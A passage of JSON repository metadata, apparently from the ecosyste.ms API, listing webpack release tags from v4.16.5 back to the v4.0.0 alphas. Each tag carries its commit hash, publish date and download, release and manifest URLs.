.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025